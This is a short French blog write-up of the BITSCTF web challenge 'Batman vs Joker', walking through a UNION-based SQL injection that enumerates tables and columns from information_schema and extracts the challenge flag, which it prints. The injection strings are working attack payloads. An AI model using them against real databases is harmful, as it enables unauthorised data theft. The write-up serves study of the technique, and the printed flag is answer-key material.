[BITSCTF]Batman vs Joker[WEB][30pts]

On commece les write up du CTF BitsCTF avec le challenge Batman vs Joker :

C’est une vulnérabilité de type injection SQL, tout d’abord j’entre une chaine pour verifier le nombre de colonne ici 2 :

ensuite je rentre la chaîne

' union select table_name,2 from information_schema.columns -- - 

pour récupérer le nom des tables de la base de données, la table Joker a l’air interessante j’envoie donc cette chaîne pour lister les colonnes de la table

' union select column_name,2 from information_schema.columns where table_name = 'Joker' -- -

 

Il ne reste plus qu’à récupérer le flag avec la requête suivante :

' union select flag,HaHaHa from Joker -- -

On a récupéré le flag : BITSCTF{wh4t_d03snt k1ll y0u, s1mply m4k3s y0u str4ng3r!} !

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée.